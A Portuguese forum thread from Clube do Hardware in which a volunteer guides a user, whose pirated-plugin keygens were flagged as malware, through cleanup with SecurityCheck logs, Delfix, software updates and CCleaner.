    C:\vst\Sonic Projects Op-X Pro II\Keygen.exe [MD5:449167d8c6c6f476698553530cc75fcb] is infected with Artemis!449167D8C6C6
    C:\vst\Sonic Projects Op-X Pro II\Keygen.exe has been Deleted
    C:\vst\T-Racks\IK.Multimedia.T-RackS.CS.Complete.v4.10.MacOSX.Incl.Keygen-R2R\R2R\IK_Multimedia_Keygen.exe [MD5:c050be45747ce0c7ae3ee8766cdc7d0a] is infected with Artemis!C050BE45747C
    C:\vst\T-Racks\IK.Multimedia.T-RackS.CS.Complete.v4.10.MacOSX.Incl.Keygen-R2R\R2R\IK_Multimedia_Keygen.exe has been Deleted


    C:\vst\T-Racks\R2R\IK_Multimedia_Keygen.exe [MD5:c050be45747ce0c7ae3ee8766cdc7d0a] is infected with Artemis!C050BE45747C
    C:\vst\T-Racks\R2R\IK_Multimedia_Keygen.exe has been Deleted

    Summary Report on C:
    T:
    File(s)
     TotalFiles:............ 1287569
     Clean:................. 761934
     Not Scanned:........... 525610
     Possibly Infected:..... 25

    Time: 03:20:50

    Scan completed on segunda-feira, junho 05, 2017 21:26:36

     

    ====

     

    Grato!

    Compartilhar este post


    Link para o post
    Compartilhar em outros sites
    diego_moicano    473

    Amigo, cuidado com o uso de keygen.

     

    Como está seu Windows?

    Compartilhar este post


    Link para o post
    Compartilhar em outros sites
    Thiago Anjin    0
  • Autor do tópico
  • Olá, @diego_moicano!

     

    Sobre os keygens, eu sei.. São irresistíveis ainda.. Quero parar logo!

     

    Sobre o computador, confesso que, por motivos de segurança, tenho usado apenas para rodas os procedimentos daqui desse post. Parei de usar ele para outros fins. MAS notei uma baita diferença do inicio do post pra cá, em questão de performance. Antes tava beeem carroça, agora tá mais light!

     

    Ainda me sinto inseguro em questão de usar redes ou serviços que requeiram login - exceto o fórum aqui.

     

    Abraço!

    Compartilhar este post


    Link para o post
    Compartilhar em outros sites
    diego_moicano    473

    Caro @Thiago Anjin

     

    Ok! :joia:

     

    Baixe Security Check, by glax24 e salve em sua Área de trabalho (Desktop).

     

    Atenção: Usuários Windows Vista, 7 e 8, cliquem com o botão direito do mouse e escolha: execadmin.png 

    • Aguarde enquanto a ferramenta faz o exame.
    • Ao final salve log como SecurityCheck.html
    • Abra o arquivo com o bloco de notas;
    • Selecione, copie e cole o conteúdo deste log em sua sua próxima resposta.

    Abraços :D

    Compartilhar este post


    Link para o post
    Compartilhar em outros sites
    Thiago Anjin    0
  • Autor do tópico
  • Olá, @diego_moicano!

     

    Segue em anexo:

     

    SecurityCheck by glax24 & Severnyj v.1.4.0.50 [06.06.17]
    WebSite: www.safezone.cc
    DateLog: 08.06.2017 22:43:29
    Path starting: C:\Users\AnjiN\AppData\Local\Temp\SecurityCheck\SecurityCheck.exe
    Log directory: C:\SecurityCheck\
    IsAdmin: True
    User: AnjiN
    VersionXML: 4.35is-08.06.2017
    ___________________________________________________________________________

    Windows 10(6.3.14393) (x64) Core Release: 1607 Lang: Portuguese(0416)
    Installation date OS: 14.02.2017 16:52:08
    LicenseStatus: Windows(R), Core edition Windows is in Notification mode
    LicenseStatus: Office 16, Office16ProPlusVL_KMS_Client edition Volume activation will expire : 187944 minutes
    Boot Mode: Normal
    Default Browser: Internet Explorer (C:\Program Files\Internet Explorer\iexplore.exe)
    SystemDrive: C: FS: [NTFS] Capacity: [926 Gb] Used: [690.9 Gb] Free: [235.1 Gb]
    ------------------------------- [ Windows ] -------------------------------
    Internet Explorer 11.1198.14393.0
    User Account Control enabled
    The elevation prompt for administrators disabled
    ^It is recommended to enable: Win+R typing UserAccountControlSettings and Enter^
    Windows Update (wuauserv) - The service is running
    Central de Segurança (wscsvc) - The service is running
    Registro remoto (RemoteRegistry) - The service has stopped
    Descoberta SSDP (SSDPSRV) - The service is running
    Serviços de Área de Trabalho Remota (TermService) - The service has stopped
    Windows Remote Management (WS-Management) (WinRM) - The service has stopped
    ------------------------------- [ HotFix ] --------------------------------
    HotFix KB4013429 Warning! Download Update
    ---------------------------- [ Antivirus_WMI ] ----------------------------
    Avast Antivirus (disabled and out of date)
    Windows Defender (disabled and up to date)
    Malwarebytes (enabled and up to date)
    --------------------------- [ FirewallWindows ] ---------------------------
    Firewall do Windows (MpsSvc) - The service is running
    --------------------------- [ AntiSpyware_WMI ] ---------------------------
    Malwarebytes (enabled and up to date)
    Windows Defender (disabled and up to date)
    Avast Antivirus (disabled and out of date)
    ---------------------- [ AntiVirusFirewallInstall ] -----------------------
    Avast Free Antivirus v.17.4.2294
    -------------------------- [ SecurityUtilities ] --------------------------
    Malwarebytes versão 3.1.2.1733 v.3.1.2.1733
    --------------------------- [ OtherUtilities ] ----------------------------
    WinRAR 5.40 (64-bit) v.5.40.0
    --------------------------------- [ P2P ] ---------------------------------
    µTorrent v.3.5.0.43804 Warning! P2P-client.
    --------------------------- [ AppleProduction ] ---------------------------
    Bonjour v.3.1.0.1
    iTunes v.12.5.5.5 Warning! Download Update
    ^Please use Apple Software Update tool.^
    QuickTime 7 v.7.76.80.95 Warning! This software is no longer supported. Please uninstall it and use another software.
    Serviço do Bonjour (Bonjour Service) - The service is running
    --------------------------- [ AdobeProduction ] ---------------------------
    Adobe AIR v.25.0.0.134
    Adobe Flash Player 9 Plugin v.9.0.45.0 Warning! Download Update
    Adobe Flash Player 9 ActiveX v.9.0.45.0 Warning! Download Update
    --------------------------- [ RunningProcess ] ----------------------------
    C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe v.11.0.14393.1198
    ------------------ [ AntivirusFirewallProcessServices ] -------------------
    Avast Antivirus (avast! Antivirus) - The service is running
    C:\Program Files\AVAST Software\Avast\AvastSvc.exe v.17.4.3482.0
    aswbIDSAgent (aswbIDSAgent) - The service has stopped
    C:\Program Files\AVAST Software\Avast\AvastUI.exe v.17.4.3482.0
    C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe v.3.0.0.1068
    Malwarebytes Service (MBAMService) - The service is running
    C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe v.3.1.0.479
    McAfee Validation Trust Protection Service (mfevtp) - The service is running
    C:\Windows\System32\mfevtps.exe
    Serviço Windows Defender (WinDefend) - The service has stopped
    Serviço de Inspeção de Rede do Windows Defender (WdNisSvc) - The service has stopped
    ----------------------------- [ End of Log ] ------------------------------

     

    Abraço!

    Compartilhar este post


    Link para o post
    Compartilhar em outros sites
    diego_moicano    473

    Caro @Thiago Anjin

     

    # Etapa nº 1 #

     

    Baixe o Delfix by Xplode e salve na sua área de trabalho.

     

    Clique duas vezes no delfix.exe para executá-lo. Marque as caixas conforme imagem.

     

    ** Usuários do Windows Vista ou Windows 7 clique com o direito sobre o arquivo delfix.exe, depois clique em execadmin.png.

     

    2mez6ld.png

     

    Clique no botão Executar.

     

    Ao final será gerado um log, mas não é necessário postar.

    # Etapa nº 2 #

    imageproxy.php?img=http%3A%2F%2Fi65.tiny Versões antigas de programas têm vulnerabilidades que alguns malwares podem usar para infectar o seu sistema.

    Por isso, é recomendável atualizar os programas que o Security Check apontou como desatualizados (os updates opcionais ficam ao seu critério).

    Basta clicar no Download Update de cada aviso (post acima), que irá para o site do desenvolvedor.

    <<@>> Mantenha sempre seu Windows atualizado; mantenha uma vigilância constante com o firewall e antivírus e por fim, lembre-se que, a melhor forma de prevenir começa pelas nossas atitudes!

     

    # Etapa nº 3 #

     

    O Ccleaner é um excelente utilitário de limpeza para o computador.

     

    Faça o download dele aqui Ccleaner

     

    • Após a instalação vá até o local onde o programa foi instalado, geralmente em C:\Arquivos de programas\CCleaner.
    • Clique duas vezes nesta pasta;
    • Numa área vazia desta janela, clique com o botão direito do mouse e escolha Novo > pasta e crie uma nova pasta;
    • Coloque o nome de backups.
    • Abra o programa e clique em Executar Limpeza;
    • Clique no botão Registro > Procurar Erros > Corrigir erro(s) seleciona(s)...
    • Observação: Não se esqueça de aceitar o backup das correções, e salvá-los nas pasta criada acima!

    Abraços :D

    Compartilhar este post


    Link para o post
    Compartilhar em outros sites
    Thiago Anjin    0
  • Autor do tópico
  • Olá, @diego_moicano!


    Grato pelas recomendações! Desculpe a demora na resposta, estive fora por um tempo..

     

    Completei todos os passos e executei novamente o SecurityCheck para ver se ainda havia algum problema. Para aliviar a consciência, colocarei novamente o log aqui no post:

     

    ====

     

    SecurityCheck by glax24 & Severnyj v.1.4.0.51 [13.06.17]
    WebSite: www.safezone.cc
    DateLog: 18.06.2017 18:15:12
    Path starting: C:\Users\AnjiN\AppData\Local\Temp\SecurityCheck\SecurityCheck.exe
    Log directory: C:\SecurityCheck\
    IsAdmin: True
    User: AnjiN
    VersionXML: 4.38is-16.06.2017
    ___________________________________________________________________________

    Windows 10(6.3.14393) (x64) Core Release: 1607 Lang: Portuguese(0416)
    Installation date OS: 14.02.2017 16:52:08
    LicenseStatus: Windows(R), Core edition Windows is in Notification mode
    LicenseStatus: Office 16, Office16ProPlusVL_KMS_Client edition Volume activation will expire : 173811 minutes
    Boot Mode: Normal
    Default Browser: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    SystemDrive: C: FS: [NTFS] Capacity: [926 Gb] Used: [691.8 Gb] Free: [234.2 Gb]
    ------------------------------- [ Windows ] -------------------------------
    Internet Explorer 11.1358.14393.0
    User Account Control enabled
    Windows Update (wuauserv) - The service is running
    Central de Segurança (wscsvc) - The service is running
    Registro remoto (RemoteRegistry) - The service has stopped
    Descoberta SSDP (SSDPSRV) - The service is running
    Serviços de Área de Trabalho Remota (TermService) - The service has stopped
    Windows Remote Management (WS-Management) (WinRM) - The service has stopped
    ---------------------------- [ Antivirus_WMI ] ----------------------------
    Avast Antivirus (enabled and up to date)
    Windows Defender (disabled and up to date)
    --------------------------- [ FirewallWindows ] ---------------------------
    Firewall do Windows (MpsSvc) - The service is running
    --------------------------- [ AntiSpyware_WMI ] ---------------------------
    Windows Defender (disabled and up to date)
    Avast Antivirus (enabled and up to date)
    ---------------------- [ AntiVirusFirewallInstall ] -----------------------
    Avast Free Antivirus v.17.4.2294
    -------------------------- [ SecurityUtilities ] --------------------------
    Malwarebytes versão 3.1.2.1733 v.3.1.2.1733
    --------------------------- [ OtherUtilities ] ----------------------------
    WinRAR 5.40 (64-bit) v.5.40.0
    --------------------------------- [ P2P ] ---------------------------------
    µTorrent v.3.5.0.43804 Warning! P2P-client.
    --------------------------- [ AppleProduction ] ---------------------------
    Bonjour v.3.1.0.1
    iTunes v.12.6.1.25
    Serviço do Bonjour (Bonjour Service) - The service is running
    --------------------------- [ AdobeProduction ] ---------------------------
    Adobe AIR v.25.0.0.134
    Adobe Flash Player 26 NPAPI v.26.0.0.131
    Adobe Flash Player 9 ActiveX v.9.0.45.0 Warning! Download Update
    ------------------------------- [ Browser ] -------------------------------
    Google Chrome v.59.0.3071.86 Warning! Download Update
    --------------------------- [ RunningProcess ] ----------------------------
    C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe v.11.0.14393.1358
    ------------------ [ AntivirusFirewallProcessServices ] -------------------
    Avast Antivirus (avast! Antivirus) - The service is running
    C:\Program Files\AVAST Software\Avast\AvastSvc.exe v.17.4.3482.0
    aswbIDSAgent (aswbIDSAgent) - The service is running
    C:\Program Files\AVAST Software\Avast\AvastUI.exe v.17.4.3482.0
    Malwarebytes Service (MBAMService) - The service is running
    C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe v.3.1.0.479
    McAfee Validation Trust Protection Service (mfevtp) - The service is running
    C:\Windows\System32\mfevtps.exe
    C:\Program Files\Windows Defender\MsMpEng.exe v.4.10.14393.1198
    C:\Program Files\Windows Defender\MpCmdRun.exe v.4.10.14393.1198
    C:\Program Files\Windows Defender\MSASCuiL.exe v.4.10.14393.1198
    Serviço Windows Defender (WinDefend) - The service is running
    Serviço de Inspeção de Rede do Windows Defender (WdNisSvc) - The service has stopped
    ----------------------------- [ End of Log ] ------------------------------

     

    ====

     

    Uma pontuação importante sobre as etapas de atualização dos plug-ins da Adobe: ao atualizar um deles, uma janela do Chrome abriu, na página de agradecimento (Thank you for downloading...). Curioso, pois ainda não reinstalei o Chrome. Conseguimos ver mais a fundo esse 'resquício'? O curioso é que ele foi executado no caminho original, não mais em pastas curiosas, como a Everness.. Aliás, ele aparece no SecurityCheck, agora! Alguma dica?

     

    p.s.: no log do SecurityCheck ainda consta o plugin activeX do flash 9 como desatualizado, mas quando tento instalar, ele acusa já estar na versão mais atualizada.

     

    Agora estou executando o Ccleaner.

     

    Grato!

    Compartilhar este post


    Link para o post
    Compartilhar em outros sites
    diego_moicano    473

    Amigo, desinstale completamente o Chrome e o activeX e reinstale ambos outra vez.

     

    Podemos finalizar?

    Compartilhar este post


    Link para o post
    Compartilhar em outros sites
    Turco    634

    Tópico Arquivado

     

    Como o autor não respondeu ao tópico por mais de 10 dias, o mesmo foi arquivado. Caso você seja o autor do tópico e quer que o mesmo seja reaberto, entre em contato com um Analista de Segurança ou Coordenador solicitando o desbloqueio.

     

    Compartilhar este post


    Link para o post
    Compartilhar em outros sites
    Visitante
    Este tópico está impedido de receber novos posts.





    Sobre o Clube do Hardware

    No ar desde 1996, o Clube do Hardware é uma das maiores, mais antigas e mais respeitadas publicações sobre tecnologia do Brasil. Leia mais

    Direitos autorais

    Não permitimos a cópia ou reprodução do conteúdo do nosso site, fórum, newsletters e redes sociais, mesmo citando-se a fonte. Leia mais

    ×